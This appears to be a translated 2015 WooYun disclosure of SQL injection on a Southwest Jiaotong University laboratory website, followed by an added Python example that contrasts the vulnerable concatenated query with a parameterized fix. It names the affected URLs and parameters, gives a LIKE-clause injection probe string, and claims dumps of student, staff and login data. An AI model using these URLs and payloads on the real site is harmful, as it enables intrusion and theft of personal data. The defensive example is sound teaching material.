Vulnerability summary

Defect ID: wooyun-2015-0109207

Title: SQL injection at the Southwest Jiaotong University State Key Laboratory

Vendor: Southwest Jiaotong University (西南交通大学)

Author: harbour_bin

Submitted: 2015-04-24 15:43

Fix deadline: 2015-04-29 15:44

Disclosed: 2015-04-29 15:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner (CCERT, the education network emergency response group) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-24: Details sent to the vendor, awaiting vendor handling
2015-04-29: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Multiple SQL injection points at the Southwest Jiaotong University State Key Laboratory (over 200 tables can be dumped, exposing national ID numbers, email addresses, mobile numbers, passwords and other information)

Detailed description:

Multiple SQL injection points at the Southwest Jiaotong University State Key Laboratory

1. http://www.tplswjtu.com/WebSite1/detail.aspx?pnodenum=00291202&id=010
2. http://www.tplswjtu.com/website1/ShowPage.aspx?PnodeNum=002902%'%20and%20'%'='
First injection point: the pnodenum and id parameters
Second injection point: the PnodeNum parameter
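The second URL's value (`002902%' and '%'='`) is the shape of a LIKE-clause probe: it only works if the parameter is concatenated straight into a quoted LIKE literal. The following is an added illustration, not code from the report or from the affected site, that rebuilds that vulnerable query next to a parameterized one. The table, column `Title` and the rows are constructed; the real schema is unknown and only the parameter name PnodeNum comes from the report.

```python
import sqlite3
from urllib.parse import unquote

# Constructed sample rows standing in for the lab's PnodeNum-keyed page table
# (assumption: the real schema is unknown; only the parameter name is from the report).
ROWS = [("002901", "Page A"), ("002902", "Page B"),
        ("00290201", "Page C"), ("003001", "Page D")]

def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Pages (PnodeNum TEXT, Title TEXT)")
    conn.executemany("INSERT INTO Pages VALUES (?, ?)", ROWS)
    return conn

def lookup_vulnerable(conn, pnodenum):
    # The construction the report's second URL implies: user input spliced into a
    # quoted LIKE literal, so a quote in the input becomes SQL syntax.
    sql = ("SELECT Title FROM Pages WHERE PnodeNum LIKE '" + pnodenum + "%'"
           " ORDER BY PnodeNum")
    return [r[0] for r in conn.execute(sql)]

def lookup_safe(conn, pnodenum):
    # Hardened form: the prefix travels as a bound parameter, so quotes are data.
    # LIKE wildcards are escaped too, so input cannot widen the match with % or _.
    escaped = (pnodenum.replace("\\", "\\\\")
                       .replace("%", "\\%")
                       .replace("_", "\\_"))
    sql = "SELECT Title FROM Pages WHERE PnodeNum LIKE ? ESCAPE '\\' ORDER BY PnodeNum"
    return [r[0] for r in conn.execute(sql, (escaped + "%",))]

# The parameter value exactly as it appears in the report's second URL.
RAW_PARAM = "002902%'%20and%20'%'='"

def demo():
    conn = _db()
    value = unquote(RAW_PARAM)  # "%'" is not a valid escape, so only %20 decodes
    return {
        "benign_vulnerable": lookup_vulnerable(conn, "002902"),
        "payload_vulnerable": lookup_vulnerable(conn, value),
        "benign_safe": lookup_safe(conn, "002902"),
        "payload_safe": lookup_safe(conn, value),
    }
```

In the concatenated version the injected suffix is absorbed into the SQL as a true condition and the page renders exactly like the benign request, which is what makes the probe informative; in the parameterized version the same string is just a prefix that matches nothing.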

Proof of vulnerability:

1. Injection proof

[Screenshot: 证明.png]


2. 270 tables can be enumerated; the data volume is large



3. Data extracted from some of the tables

[Screenshot: StudentInfo.png]


[Screenshot: TeachInfo.png]


[Screenshot: UserLogin.png]


Fix recommendation:

You are the experts.

Copyright notice: please credit the source when reposting: harbour_bin@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-04-29 15:44

Vendor reply:

Latest status:

None